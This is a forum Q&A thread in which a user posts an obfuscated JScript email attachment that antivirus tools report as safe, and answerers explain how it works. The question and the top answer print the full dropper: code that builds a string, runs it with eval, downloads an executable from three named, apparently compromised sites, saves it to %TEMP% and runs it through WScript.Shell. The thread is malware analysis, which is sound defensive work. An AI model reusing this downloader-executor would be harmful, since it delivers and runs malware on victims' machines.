# Can somebody explain what this obfuscated JS code received by email does? It fools AVG, MWB, Spybot, which all report it SAFE!

Tags: malware

Below is the JS code. I would like to understand how it extracts the malware code, and what it does. I tried to Google parts of the original str, as well as convert it from hex to ASCII:

```
(URR^
$
    J   ^<^

J   ^U^UPPSQURVSP^U)
```

--> there must be some basic decryption taking place in the code.

Here is the code:

```
var str="5552525E0D0A020B24070D17070B09051C4A070B095E3C5E100C010D140D10070C4A070B095E17555E555050535155525653505E55";function e8(){return '5"; va';};function q5(){return 'seBody)';};function x6(){return 'ength; ';};function s7(){return '+"/co';};function v1(){return '); var ';};function e9(){return '}; };';};function k2(){return 'EMP%"';};function t6(){return 'ar fn';};function p0(){return 't.Creat';};function q2(){return n2;};function x2(){return 'or (v';};function m7(){return 'r ld =';};function f5(){return '+b[i]';};function m2(){return 'tp://"';};function t5(){return 'eoakres';};function w8(){return '.save';};function o3(){return 'd(); i';};function h9(){return ' = ws';};function p3(){return 'n, fals';};function l4(){return 't.Creat';};function u5(){return '07660"+';};function r3(){return 'Script';};function a9(){return '.split(';};function x1(){return 'tString';};function e7(){return ' = "liv';};function h3(){return '; }; if';};function a2(){return 'eObje';};function s1(){return 'dn = 0;';};function p9(){return 'ode(92)';};function j0(){return 'ct("W';};function b1(){return 'r xo =';};function z3(){return 'B.Strea';};function e6(){return '0); }';};function o0(){return '; xa.t';};function c1(){return 'dn = ';};function c3(){return ' catch';};function k6(){return 'ToFile';};function c7(){return 'eObjec';};function u8(){return 'i++) ';};function v0(){return 'ndEnv';};function y2(){return 'e > 10';};function t3(){return 'ort.com';};function l5(){return '=3; n+';};function u9(){return ' samir';};function y9(){return '1; xa';};function s4(){return '{ ws.Ru';};function y3(){return 'MLHTTP"';};function v2(){return 'catch (';};function h0(){return 'e); x';};function m5(){return 'f (xo';};function q1(){return '(fn+n';};function j3(){return ' }; }';};function o1(){return 'ct("M';};function f8(){return '+".exe';};function h2(){return 'n(fn+';};function x8(){return ' try ';};function s6(){return 'ar ws =';};function t4(){return 'agalle';};function z7(){return 't("ADOD';};function r8(){return ' (dn ';};function k9(){return 'l"); v';};function t7(){return ' };';};function a6(){return 'respon';};function u3(){return '(xa.siz';};function g3(){return ')+Stri';};function i9(){return 'break;';};function l0(){return '+"40239';};function o9(){return ' (er) {';};function j5(){return 'ype = 1';};function p4(){return 'ng.fr';};function k5(){return '.posit';};function c4(){return 'ion =';};function f3(){return 'eObje';};function o4(){return 'Script';};function a1(){return '.Expa';};function w0(){return ' 0; xa';};function b2(){return 'unter/?';};function q0(){return '.status';};function o5(){return '.open()';};function r0(){return 'SXML2.X';};function d7(){return ' amper';};function w3(){return 'ar i=ld';};function p2(){return 'var b';};function z4(){return 'xa = W';};function o7(){return 'T","ht';};function a5(){return ' == 20';};function i0(){return ' WScrip';};function z5(){return 'ite(xo.';};function v8(){return '&rnd=3';};function f4(){return '{ xo.op';};function g9(){return 'm"); va';};function u4(){return 'close()';};function j1(){return '; i<b.l';};function u6(){return ' 0; for';};function w7(){return '",2);';};function a0(){return ' (var n';};function u7(){return 'omCharC';};function f1(){return '; xa.';};function b6(){return 'n+".ex';};function z6(){return 'str+"';};function i8(){return '.Shel';};function s2(){return '; xa.wr';};function x3(){return '== 1)';};function g5(){return 'en("GE';};function z0(){return 'id="+';};function b7(){return 'ironmen';};function h8(){return 'spect';};function i6(){return '.Creat';};function e3(){return 'e",1,';};function s0(){return '00) { ';};function d4(){return ' { ld ';};function s5(){return '{ var ';};function t9(){return ' try ';};function q8(){return 'ive.com';};function d0(){return '" "); v';};function l7(){return '; if ';};function w9(){return ' WScrip';};function q6(){return '= i; ';};function j9(){return '=1; n<';};function x7(){return '0) { xa';};function z8(){return 'er) { ';};function n9(){return ' }; } ';};function a4(){return '+) { f';};var z1='';var n2=eval;var t2='';function o6(){return 's("%T';};function y6(){return 'o.sen';};function i5(){return 'ry.com"';};t2=p2();z1+=t2;t2=e7();z1+=t2;t2=t5();z1+=t2;t2=t3();z1+=t2;t2=d7();z1+=t2;t2=h8();z1+=t2;t2=q8();z1+=t2;t2=u9();z1+=t2;t2=t4();z1+=t2;t2=i5();z1+=t2;t2=a9();z1+=t2;t2=d0();z1+=t2;t2=s6();z1+=t2;t2=w9();z1+=t2;t2=p0();z1+=t2;t2=f3();z1+=t2;t2=j0();z1+=t2;t2=r3();z1+=t2;t2=i8();z1+=t2;t2=k9();z1+=t2;t2=t6();z1+=t2;t2=h9();z1+=t2;t2=a1();z1+=t2;t2=v0();z1+=t2;t2=b7();z1+=t2;t2=x1();z1+=t2;t2=o6();z1+=t2;t2=k2();z1+=t2;t2=g3();z1+=t2;t2=p4();z1+=t2;t2=u7();z1+=t2;t2=p9();z1+=t2;t2=l0();z1+=t2;t2=e8();z1+=t2;t2=b1();z1+=t2;t2=i0();z1+=t2;t2=l4();z1+=t2;t2=a2();z1+=t2;t2=o1();z1+=t2;t2=r0();z1+=t2;t2=y3();z1+=t2;t2=v1();z1+=t2;t2=z4();z1+=t2;t2=o4();z1+=t2;t2=i6();z1+=t2;t2=c7();z1+=t2;t2=z7();z1+=t2;t2=z3();z1+=t2;t2=g9();z1+=t2;t2=m7();z1+=t2;t2=u6();z1+=t2;t2=a0();z1+=t2;t2=j9();z1+=t2;t2=l5();z1+=t2;t2=a4();z1+=t2;t2=x2();z1+=t2;t2=w3();z1+=t2;t2=j1();z1+=t2;t2=x6();z1+=t2;t2=u8();z1+=t2;t2=s5();z1+=t2;t2=s1();z1+=t2;t2=x8();z1+=t2;t2=f4();z1+=t2;t2=g5();z1+=t2;t2=o7();z1+=t2;t2=m2();z1+=t2;t2=f5();z1+=t2;t2=s7();z1+=t2;t2=b2();z1+=t2;t2=z0();z1+=t2;t2=z6();z1+=t2;t2=v8();z1+=t2;t2=u5();z1+=t2;t2=p3();z1+=t2;t2=h0();z1+=t2;t2=y6();z1+=t2;t2=o3();z1+=t2;t2=m5();z1+=t2;t2=q0();z1+=t2;t2=a5();z1+=t2;t2=x7();z1+=t2;t2=o5();z1+=t2;t2=o0();z1+=t2;t2=j5();z1+=t2;t2=s2();z1+=t2;t2=z5();z1+=t2;t2=a6();z1+=t2;t2=q5();z1+=t2;t2=l7();z1+=t2;t2=u3();z1+=t2;t2=y2();z1+=t2;t2=s0();z1+=t2;t2=c1();z1+=t2;t2=y9();z1+=t2;t2=k5();z1+=t2;t2=c4();z1+=t2;t2=w0();z1+=t2;t2=w8();z1+=t2;t2=k6();z1+=t2;t2=q1();z1+=t2;t2=f8();z1+=t2;t2=w7();z1+=t2;t2=t9();z1+=t2;t2=s4();z1+=t2;t2=h2();z1+=t2;t2=b6();z1+=t2;t2=e3();z1+=t2;t2=e6();z1+=t2;t2=c3();z1+=t2;t2=o9();z1+=t2;t2=j3();z1+=t2;t2=f1();z1+=t2;t2=u4();z1+=t2;t2=h3();z1+=t2;t2=r8();z1+=t2;t2=x3();z1+=t2;t2=d4();z1+=t2;t2=q6();z1+=t2;t2=i9();z1+=t2;t2=n9();z1+=t2;t2=v2();z1+=t2;t2=z8();z1+=t2;t2=e9();z1+=t2;t2=t7();z1+=t2;q2()(z1);
```

Answer (score 4):

This is obfuscated code which constructs a string and runs this string as JavaScript code using eval. This JavaScript code makes then use of the Windows Scripting Host to download some data from remote hosts, saves them to some file.exe and finally runs it. The URL's it loads the executable files from are something like

```
hxxp://samiragallery.com/counter/?id=5552525E....&rnd=....
```

It tries several URL's until it could successfully execute the program.

The exact code it executes is this:

```
var str="5552525E0D0A020B24070D17070B09051C4A070B095E3C5E100C010D140D10070C4A070B095E17555E555050535155525653505E55";

var b = "liveoakresort.com amperspective.com samiragallery.com".split(" ");
var ws = WScript.CreateObject("WScript.Shell");
var fn = ws.ExpandEnvironmentStrings("%TEMP%") + String.fromCharCode(92) + "402395";
var xo = WScript.CreateObject("MSXML2.XMLHTTP");
var xa = WScript.CreateObject("ADODB.Stream");
var ld = 0;
for (var n = 1; n <= 3; n++) {
    for (var i = ld; i < b.length; i++) {
        var dn = 0;
        try {
            xo.open("GET", "http://" + b[i] + "/counter/?id=" + str + "&rnd=307660" + n, false);
            xo.send();
            if (xo.status == 200) {
                xa.open();
                xa.type = 1;
                xa.write(xo.responseBody);
                if (xa.size > 1000) {
                    dn = 1;
                    xa.position = 0;
                    xa.saveToFile(fn + n + ".exe", 2);
                    try {
                        ws.Run(fn + n + ".exe", 1, 0);
                    } catch (er) {};
                };
                xa.close();
            };
            if (dn == 1) {
                ld = i;
                break;
            };
        } catch (er) {};
    };
};
```

Comment: This downloads a `.gif` file with a random name, which is actually an executable.

Comment: @MarkHulkalo: where did you get the information that this is a GIF file? I get no usable content back from these URL's.

Comment: I downloaded the malware itself and I'm in the process of reverse-engineering it. I think you need to send the appropriate ID for it to work, but I'm not sure; I haven't attempted it without that.

Comment: You only need to provide an id parameter, it can even be empty. Of course, these compromised pages will stop serving the malware once they are cleaned by their rightful owners. VT analysis of the file: https://www.virustotal.com/es/file/765d3e43c4efd80e2f3370994d09ba3bc3d92729ddc5fd0aa18d4767fed5068a/analysis/1447540793/

Answer (score 2):

The script code is somewhat obfuscated. After inserting newlines the code looks like below.
In the first part a lot of small functions are defined that just return a small string.
Also note that `q2()` returns `n2`.

```
var str="5552525E0D0A020B24070D17070B09051C4A070B095E3C5E100C010D140D10070C4A070B095E17555E555050535155525653505E55";
function e8(){return '5"; va';};
function q5(){return 'seBody)';};
function x6(){return 'ength; ';};
function s7(){return '+"/co';};
function v1(){return '); var ';};
function e9(){return '}; };';};
function k2(){return 'EMP%"';};
function t6(){return 'ar fn';};
function p0(){return 't.Creat';};

function q2(){return n2;};
[Large snip]
```

In the next segment `n2` is set to the javascript function `eval`.
Also the code starts calling each of the above functions once and concatenates the result in variable `z1`.

```
var z1='';
var n2=eval;
var t2='';
function o6(){return 's("%T';};
function y6(){return 'o.sen';};
function i5(){return 'ry.com"';};
t2=p2();z1+=t2;
t2=e7();z1+=t2;
t2=t5();z1+=t2;
t2=t3();z1+=t2;
```

End of code:
Here the call to `q2()` returns `n2` which was equal to `eval`.

```
t2=v2();z1+=t2;
t2=z8();z1+=t2;
t2=e9();z1+=t2;
t2=t7();z1+=t2;

q2()(z1)
```

In the end the entire script-string that was built into z1 is executed with 'eval'.

See Steffens answer for the complete script but essentially it downloads an executable from a (probably infected) website and executes it.

This executable would probably trigger the virusscanners (but better not try it).